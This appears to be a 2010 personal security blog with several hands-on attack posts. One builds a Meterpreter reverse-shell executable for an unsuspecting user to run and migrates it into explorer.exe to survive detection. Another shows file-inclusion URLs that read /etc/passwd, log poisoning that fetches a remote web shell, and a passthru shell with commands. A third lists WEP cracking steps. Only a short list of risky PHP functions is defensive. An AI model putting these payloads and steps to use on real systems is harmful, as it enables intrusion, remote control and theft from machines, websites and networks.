Payloads and Metasploit

May 31, 2010 at 8:57 pm (Metasploit, Security)

Hey,

I have been playing around with the Metasploit Framework over the weekend. Something I found rather interesting was the msfpayload tool. I will show you how to create a TCP reverse connect shell for windows machines. Be aware that these binaries will be detected by Anti Virus software. There are quite a lot of tutorials around on the web that talk about making binaries undetectable to Anti Virus software. Maybe in the not so distant future I will write a post about it, but for now onto creating the payload…

root@bt:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.65 LPORT=4444 X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.1.65,LPORT=4444
root@bt:/pentest/exploits/framework3#

This will create a binary called payload.exe that when an unsuspecting user clicks on will open a remote TCP connection to: 192.168.1.65 on port 4444. Now on that machine what you want to have already running is:

root@bt:/pentest/exploits/framework3# ./msfconsole

=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 263 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
=[ svn r9381 updated today (2010.05.30)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.65
LHOST => 192.168.1.65
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.65:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.64
[*] Meterpreter session 1 opened (192.168.1.65:4444 -> 192.168.1.64:61267) at Mon May 31 21:38:53 +0100 2010

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System
272 smss.exe
372 csrss.exe
424 wininit.exe
456 csrss.exe
480 services.exe
520 winlogon.exe
532 lsass.exe
540 lsm.exe
656 svchost.exe
720 nvvsvc.exe
760 svchost.exe
848 svchost.exe
916 svchost.exe
944 svchost.exe
360 svchost.exe
1016 nvvsvc.exe
1148 svchost.exe
1328 spoolsv.exe
1356 svchost.exe
1532 MDM.EXE
1584 ccsvchst.exe
1664 vmware-usbarbitrator.exe
1244 vmnat.exe
1232 vmware-authd.exe
1808 taskhost.exe x64 1 workstation\zoidberg C:\Windows\System32\taskhost.exe
1108 ccsvchst.exe x86 1
1684 vmnetdhcp.exe
2696 svchost.exe
204 dwm.exe x64 1 workstation\zoidberg C:\Windows\System32\dwm.exe
2852 explorer.exe x64 1 workstation\zoidberg C:\Windows\explorer.exe
2916 sidebar.exe x64 1 workstation\zoidberg C:\Program Files\Windows Sidebar\sidebar.exe
364 jusched.exe x86 1 workstation\zoidberg C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
732 hqtray.exe x86 1 workstation\zoidberg C:\Program Files (x86)\VMware\VMware Player\hqtray.exe
2404 SearchIndexer.exe
2036 svchost.exe
3144 wmpnetwk.exe
3228 svchost.exe
3840 Azureus.exe x86 1 workstation\zoidberg C:\Program Files (x86)\Vuze\Azureus.exe
2936 firefox.exe x86 1 workstation\zoidberg C:\Program Files (x86)\Mozilla Firefox\firefox.exe
612 SearchProtocolHost.exe
1088 SearchFilterHost.exe
2408 cmd.exe x64 1 workstation\zoidberg C:\Windows\System32\cmd.exe
2676 conhost.exe x64 1 workstation\zoidberg C:\Windows\System32\conhost.exe
4052 payload.exe x86 1 workstation\zoidberg C:\Users\zoidberg\Downloads\payload.exe
3360 NETSTAT.EXE x64 1 workstation\zoidberg C:\Windows\System32\NETSTAT.EXE
3772 Bubbles.scr x64 1 workstation\zoidberg C:\Windows\System32\Bubbles.scr

meterpreter > migrate 2852
[*] Migrating to 2852...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer: WORKSTATION
OS : Windows 7 (Build 7600, ).
Arch : x64
Language: en_GB
meterpreter >

As you can see, it sits there waiting for a connection on port 4444 if it receives a connection then it will drop a meterprerter shell.

Issuing the migrate pid command above in the meterpreter shell basically migrates the process from the binary which we originally connected on to the explorer.exe process (which is the current logged in users sessions process). So now our meterprerter shell will stay open until the user logs out. This is a good trick in case the user notices that the binary was malicious and kills any abnormal processes.

Permalink Leave a Comment

Insecure PHP Functions And Their Exploits…

May 27, 2010 at 9:14 pm (LFI / RFI, PHP, Programming, Security)

Hey all,

I am going to list various PHP functions and their misuses along with ways to manipulate them:

require($filename);
http://localhost/?filename=/etc/passwd

require("stuff/".$filename);
http://localhost/?filename=/../../../../../etc/passwd

require("stuff/".$filename.".php");
http://localhost/?filename=/../../../../../etc/passwd%00

require("stuff/".$_COOKIE['something'].".php");
javascript:document.cookie = "something=../../../../../etc/passwd%00";

A neat little trick to allow you to upload stuff using these LFI / RFI vulnerabilities, is to poison the log files (access_log / error_log). I figured, the easiest way to do this was to load the live HTTP headers Firefox plug in. Load the LFI page in your browser, capture the request, and change the User-Agent string to some PHP code of your choice. You can then browse to the log file using the LFI or RFI vulnerability, then when the page loads it will execute your PHP code. Look at these headers for instance:

Host: localhost
User-Agent: <?php system('GET http://www.example.com/phpshell/shell.txt > shell.php'); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

If you replay this using live HTTP headers it will poison the log file with:

127.0.0.1 - - [27/May/2010:21:30:17 +0100]
"GET /testing/vuln.php?COLOR=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 855 "-" "<?php system('GET.php'); ?>"

Then when you view the log file using the LFI / RFI it will execute the above PHP code. You can then browse to the PHP shell (shell.php) that will be located in the same directory as the LFI / RFI page 🙂

So, say we placed the following code into shell.php:

<? passthru($_GET[pwn]) ?>

Now we have that piece of code on our victim which we can navigate to through the following URL:

http://localhost/shell.php

To take advantage of this simple PHP shell, alls we have to do is:

http://localhost/shell.php%00&pwn=cat%20/etc/passwd%00
http://localhost/shell.php%00&pwn=uname%20-a
http://localhost/shell.php%00&pwn=who
http://localhost/shell.php%00&pwn=ps%20afuuwx

Then the command output will be displayed on the page 🙂

A quick note:

%00 is a NULL
%20 is a SPACE

Until the next time…

Permalink 3 Comments

Playing around with Local and Remote file inclusions…

May 27, 2010 at 10:54 am (LFI / RFI, PHP, Programming, Security)

Hey all,

So with my recent research into web application security I have been playing around with local and remote file inclusions on my local web server 😉 A couple of things to note so that when you perform an LFI or RFI it actually works.

1) Make sure magic quotes is off, so your able to include said files:

; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off

Otherwise you will get an error similar to this when trying to include files:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

That is magic quotes kicking in, make sure you turn it off before playing with these techniques!

2) Also you need to make sure allow_url_fopen and allow_url_include are set to on:

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as fil$
allow_url_include = On

Or you will get an error that looks similar to:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in /var/www/testing/vuln.php on line 5

Warning: include(http://www.google.com/) [function.include]: failed to open stream: no suitable wrapper could be found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

Now you should be able to play around with LFI/RFI with no issues, consider the following example:

root@bt:/var/www/testing# ls -l
total 16
-rw-r–r– 1 root root 33 May 27 10:48 blue.php
-rw-r–r– 1 root root 20 May 27 10:43 phpinfo.php
-rw-r–r– 1 root root 32 May 27 10:48 red.php
-rw-r–r– 1 root root 297 May 27 10:44 vuln.php
root@bt:/var/www/testing# cat vuln.php
<?php
$color = ‘blue’;
if (isset( $_GET[‘COLOR’] ) )
$color = $_GET[‘COLOR’];
include( $color . ‘.php’ );
?>

<form method=”get”>
<select name=”COLOR”>
<option value=”red”>red</option>
<option value=”blue”>blue</option>
</select>
<input type=”submit”>
</form>

root@bt:/var/www/testing# cat blue.php red.php
<?php echo “testing blue…”; ?>
<?php echo “testing red…”; ?>
root@bt:/var/www/testing#

Goto: http://localhost/testing/vuln.php then play around with the form for a bit (it shouldn’t take you too long, it’s a very simple and contrived example 😉 ) and keep your eye on the variable in the URL bar… try things like this:

http://localhost/testing/vuln.php?COLOR=phpinfo.php
http://localhost/testing/vuln.php?COLOR=../../../../../etc/passwd%00
http://localhost/testing/vuln.php?COLOR=http://www.google.com/%00

Why the %00 on the end, you may ask?

Well that is to cause a NULL at the end of the string and for PHP to stop reading it at that point, otherwise something like this may happen:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

From that it should be pretty clear as to why you need to append the %00, notice the: ‘http://www.google.com/.php&#8217; which is constructed from:

include( $color . ‘.php’ );

$color == http://www.google.com/ . ‘.php’

As the page: http://www.google.com/.php does not exist, it throws an error. Which is why you must append a NULL to the end of your URL/File/String/Etc.

Permalink Leave a Comment

Vulnerable PHP Functions…

May 26, 2010 at 2:06 pm (LFI / RFI, PHP, Programming, Security)

Hey all,

Just a quick note, here is a list of vulnerable PHP functions that you should look out for in your web apps:

Local / Remote file inclusion bugs:

include()
include_once()
require()
require_once()

Local / Remote command execution bugs:

eval()
preg_replace()
fwrite()
passthru()
file_get_contents()
shell_exec()
system()

SQL Injection bugs:

mysql_query()

File / File system bugs:

fopen()
readfile()
glob()
file()
popen()
exec()

For auditing PHP based applications grep is pretty good however the ultimate tool is PHPXRef, which you can check out here.

Permalink 5 Comments

Hacking WEP Encrypted Wireless Network Notes

May 15, 2010 at 4:09 pm (Security, Wireless)

Hey, this is just a quick post to outline the steps involved in cracking WEP protected wireless networks.  I will be using the aircrack-ng suite to do this.  Follow these steps:

1 ) airmon-ng
Find the network adapter interface to use…

2 ) airmon-ng stop wlan0
Stop the interface.

3 ) ifconfig wlan0 down
Bring the interface down.

4 ) macchanger –mac 00:11:22:33:44:55 wlan0
Bind a fake mac address to the interface.

5 ) airmon-ng start wlan0
Bring the interface back up in monitor mode.

6 ) airodump-ng wlan0
Take a look to see what networks are available.

Choose the target, grab the essential bits of information: (Victim MAC Address, BSSID, ESSID, Channel).

7 ) airodump-ng -c CHANNEL_NUMER -w FILENAME –bssid VICTIM_MAC wlan0
Start capturing IVs.

8 ) aireplay-ng -1 0 -a VICTIM_MAC -h 00:11:22:33:44:55 -e VICTIM_ESSID wlan0
Associate with the access point.

9 ) aireplay-ng -3 -b VICTIM_MAC -h 00:11:22:33:44:55 wlan0
Replay ARP packets.

10 ) aircrack-ng -n 64 -b VICTIM_MAC *.cap
Crack the password 🙂

This is a nice quick reference for hacking WEP encrypted wireless networks.

Permalink Leave a Comment